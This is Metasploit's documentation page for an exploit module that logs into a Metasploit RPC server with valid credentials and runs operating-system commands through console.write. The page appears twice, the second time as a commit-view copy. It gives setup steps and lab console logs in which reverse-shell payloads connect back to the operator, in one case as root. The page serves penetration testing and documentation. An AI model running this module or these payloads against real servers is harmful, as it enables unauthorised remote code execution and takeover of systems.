documentation/modules/exploit/multi/misc/msf_rpc_console.md

## Description

  This module connects to a specified Metasploit RPC server and uses the *console.write* procedure to execute operating system commands. Valid credentials are required to access the RPC interface.


## Vulnerable Application

  [Metasploit](https://www.rapid7.com/products/metasploit/) is the world's most used penetration testing software. The RPC API can be used to programmatically drive the Metasploit Framework and Metasploit Pro products.

  To start the RPC service, run `msfrpcd -U msf -P abc123`; or run `load msgrpc ServerHost=0.0.0.0 ServerPort=55552 User=msf Pass=abc123 SSL=Y` from within msfconsole.

  This module has been tested successfully on:

  * Metasploit 4.15 on Kali 1.0.6
  * Metasploit 4.14 on Kali 2017.1
  * Metasploit 4.14 on Windows 7 SP1

  Source and Installers:

  * [Source Code Repository](https://github.com/rapid7/metasploit-framework)
  * [Installers](https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version)

## Verification Steps

  1. Start `msfconsole`
  2. Do: `use exploit/multi/misc/msf_rpc_console`
  3. Do: `set RHOST [IP]`
  4. Do: `set RPORT [PORT]` (default: `55552`)
  5. Do: `set USERNAME [USERNAME]` (default: `msf`)
  6. Do: `set PASSWORD [PASSWORD]`
  7. Do: `set LHOST [IP]`
  8. Do: `run`
  9. You should get a session


## Options

  **Username**

  The username for Metasploit RPC (default: `msf`).

  **Password**

  The password for the RPC user.


## Scenarios

### Ruby Target

  ```
  msf > use exploit/multi/misc/msf_rpc_console 
  msf exploit(msf_rpc_console) > set rhost 172.16.191.166
  rhost => 172.16.191.166
  msf exploit(msf_rpc_console) > set username msf
  username => msf
  msf exploit(msf_rpc_console) > set password abc123
  password => abc123
  msf exploit(msf_rpc_console) > set lhost 172.16.191.181
  lhost => 172.16.191.181
  msf exploit(msf_rpc_console) > set target 0
  target => 0
  msf exploit(msf_rpc_console) > run

  [*] Started reverse TCP handler on 172.16.191.181:4444 
  [+] 172.16.191.166:55552 - Authenticated successfully
  [*] 172.16.191.166:55552 - Metasploit 4.14.28-dev
  [*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21
  [*] 172.16.191.166:55552 - API version 1.0
  [+] 172.16.191.166:55552 - Created console #0
  [*] 172.16.191.166:55552 - Sending payload...
  [*] Command shell session 1 opened (172.16.191.181:4444 -> 172.16.191.166:52984) at 2017-07-05 03:40:50 -0400

  whoami
  win-sgbsd5tqutq\user
  ```

### Windows CMD Target

  ```
  msf > use exploit/multi/misc/msf_rpc_console 
  msf exploit(msf_rpc_console) > set rhost 172.16.191.166
  rhost => 172.16.191.166
  msf exploit(msf_rpc_console) > set username msf
  username => msf
  msf exploit(msf_rpc_console) > set password abc123
  password => abc123
  msf exploit(msf_rpc_console) > set lhost 172.16.191.181
  lhost => 172.16.191.181
  msf exploit(msf_rpc_console) > set target 0
  target => 1
  msf exploit(msf_rpc_console) > set payload cmd/windows/powershell_reverse_tcp 
  payload => cmd/windows/powershell_reverse_tcp
  msf exploit(msf_rpc_console) > run

  [*] Started reverse SSL handler on 172.16.191.181:4444 
  [+] 172.16.191.166:55552 - Authenticated successfully
  [*] 172.16.191.166:55552 - Metasploit 4.14.28-dev
  [*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21
  [*] 172.16.191.166:55552 - API version 1.0
  [+] 172.16.191.166:55552 - Created console #1
  [*] 172.16.191.166:55552 - Sending payload...
  [*] Powershell session session 2 opened (172.16.191.181:4444 -> 172.16.191.166:52996) at 2017-07-05 03:44:05 -0400

  Windows PowerShell running as user user on WIN-SGBSD5TQUTQ
  Copyright (C) 2015 Microsoft Corporation. All rights reserved.

  PS C:\metasploit>whoami
  win-sgbsd5tqutq\user
  ```

### Unix CMD Target

  ```
  msf > use exploit/multi/misc/msf_rpc_console 
  msf exploit(msf_rpc_console) > set rhost 172.16.191.215
  rhost => 172.16.191.215
  msf exploit(msf_rpc_console) > set username msf
  username => msf
  msf exploit(msf_rpc_console) > set password abc123
  password => abc123
  msf exploit(msf_rpc_console) > set lhost 172.16.191.181
  lhost => 172.16.191.181
  msf exploit(msf_rpc_console) > set target 2
  target => 2
  msf exploit(msf_rpc_console) > set payload cmd/unix/reverse_python
  payload => cmd/unix/reverse_python
  msf exploit(msf_rpc_console) > run

  [*] Started reverse TCP handler on 172.16.191.181:4444 
  [+] 172.16.191.215:55552 - Authenticated successfully
  [*] 172.16.191.215:55552 - Metasploit 4.15.0-dev-aceeedc
  [*] 172.16.191.215:55552 - Ruby 2.3.0 x86_64-linux 2015-12-25
  [*] 172.16.191.215:55552 - API version 1.0
  [+] 172.16.191.215:55552 - Created console #0
  [*] 172.16.191.215:55552 - Sending payload...
  [*] Command shell session 3 opened (172.16.191.181:4444 -> 172.16.191.215:40768) at 2017-07-05 03:46:11 -0400

  id
  uid=0(root) gid=0(root) groups=0(root)
  ```
Add Metasploit RPC Console Command Execution module 2017-07-05 08:48:35 +00:00			`## Description`

			`This module connects to a specified Metasploit RPC server and uses the console.write procedure to execute operating system commands. Valid credentials are required to access the RPC interface.`


			`## Vulnerable Application`

			`[Metasploit](https://www.rapid7.com/products/metasploit/) is the world's most used penetration testing software. The RPC API can be used to programmatically drive the Metasploit Framework and Metasploit Pro products.`

			To start the RPC service, run `msfrpcd -U msf -P abc123`; or run `load msgrpc ServerHost=0.0.0.0 ServerPort=55552 User=msf Pass=abc123 SSL=Y` from within msfconsole.

			`This module has been tested successfully on:`

			`* Metasploit 4.15 on Kali 1.0.6`
			`* Metasploit 4.14 on Kali 2017.1`
			`* Metasploit 4.14 on Windows 7 SP1`

			`Source and Installers:`

			`* [Source Code Repository](https://github.com/rapid7/metasploit-framework)`
			`* [Installers](https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version)`

			`## Verification Steps`

			1. Start `msfconsole`
			2. Do: `use exploit/multi/misc/msf_rpc_console`
			3. Do: `set RHOST [IP]`
			4. Do: `set RPORT [PORT]` (default: `55552`)
			5. Do: `set USERNAME [USERNAME]` (default: `msf`)
			6. Do: `set PASSWORD [PASSWORD]`
			7. Do: `set LHOST [IP]`
			8. Do: `run`
			`9. You should get a session`


			`## Options`

			`Username`

			The username for Metasploit RPC (default: `msf`).

			`Password`

			`The password for the RPC user.`


			`## Scenarios`

			`### Ruby Target`

			```
			`msf > use exploit/multi/misc/msf_rpc_console`
			`msf exploit(msf_rpc_console) > set rhost 172.16.191.166`
			`rhost => 172.16.191.166`
			`msf exploit(msf_rpc_console) > set username msf`
			`username => msf`
			`msf exploit(msf_rpc_console) > set password abc123`
			`password => abc123`
			`msf exploit(msf_rpc_console) > set lhost 172.16.191.181`
			`lhost => 172.16.191.181`
			`msf exploit(msf_rpc_console) > set target 0`
			`target => 0`
			`msf exploit(msf_rpc_console) > run`

			`[*] Started reverse TCP handler on 172.16.191.181:4444`
			`[+] 172.16.191.166:55552 - Authenticated successfully`
			`[*] 172.16.191.166:55552 - Metasploit 4.14.28-dev`
			`[*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21`
			`[*] 172.16.191.166:55552 - API version 1.0`
			`[+] 172.16.191.166:55552 - Created console #0`
			`[*] 172.16.191.166:55552 - Sending payload...`
			`[*] Command shell session 1 opened (172.16.191.181:4444 -> 172.16.191.166:52984) at 2017-07-05 03:40:50 -0400`

			`whoami`
			`win-sgbsd5tqutq\user`
			```

			`### Windows CMD Target`

			```
			`msf > use exploit/multi/misc/msf_rpc_console`
			`msf exploit(msf_rpc_console) > set rhost 172.16.191.166`
			`rhost => 172.16.191.166`
			`msf exploit(msf_rpc_console) > set username msf`
			`username => msf`
			`msf exploit(msf_rpc_console) > set password abc123`
			`password => abc123`
			`msf exploit(msf_rpc_console) > set lhost 172.16.191.181`
			`lhost => 172.16.191.181`
			`msf exploit(msf_rpc_console) > set target 0`
			`target => 1`
			`msf exploit(msf_rpc_console) > set payload cmd/windows/powershell_reverse_tcp`
			`payload => cmd/windows/powershell_reverse_tcp`
			`msf exploit(msf_rpc_console) > run`

			`[*] Started reverse SSL handler on 172.16.191.181:4444`
			`[+] 172.16.191.166:55552 - Authenticated successfully`
			`[*] 172.16.191.166:55552 - Metasploit 4.14.28-dev`
			`[*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21`
			`[*] 172.16.191.166:55552 - API version 1.0`
			`[+] 172.16.191.166:55552 - Created console #1`
			`[*] 172.16.191.166:55552 - Sending payload...`
			`[*] Powershell session session 2 opened (172.16.191.181:4444 -> 172.16.191.166:52996) at 2017-07-05 03:44:05 -0400`

			`Windows PowerShell running as user user on WIN-SGBSD5TQUTQ`
			`Copyright (C) 2015 Microsoft Corporation. All rights reserved.`

			`PS C:\metasploit>whoami`
			`win-sgbsd5tqutq\user`
			```

			`### Unix CMD Target`

			```
			`msf > use exploit/multi/misc/msf_rpc_console`
			`msf exploit(msf_rpc_console) > set rhost 172.16.191.215`
			`rhost => 172.16.191.215`
			`msf exploit(msf_rpc_console) > set username msf`
			`username => msf`
			`msf exploit(msf_rpc_console) > set password abc123`
			`password => abc123`
			`msf exploit(msf_rpc_console) > set lhost 172.16.191.181`
			`lhost => 172.16.191.181`
			`msf exploit(msf_rpc_console) > set target 2`
			`target => 2`
			`msf exploit(msf_rpc_console) > set payload cmd/unix/reverse_python`
			`payload => cmd/unix/reverse_python`
			`msf exploit(msf_rpc_console) > run`

			`[*] Started reverse TCP handler on 172.16.191.181:4444`
			`[+] 172.16.191.215:55552 - Authenticated successfully`
			`[*] 172.16.191.215:55552 - Metasploit 4.15.0-dev-aceeedc`
			`[*] 172.16.191.215:55552 - Ruby 2.3.0 x86_64-linux 2015-12-25`
			`[*] 172.16.191.215:55552 - API version 1.0`
			`[+] 172.16.191.215:55552 - Created console #0`
			`[*] 172.16.191.215:55552 - Sending payload...`
			`[*] Command shell session 3 opened (172.16.191.181:4444 -> 172.16.191.215:40768) at 2017-07-05 03:46:11 -0400`

			`id`
			`uid=0(root) gid=0(root) groups=0(root)`
			```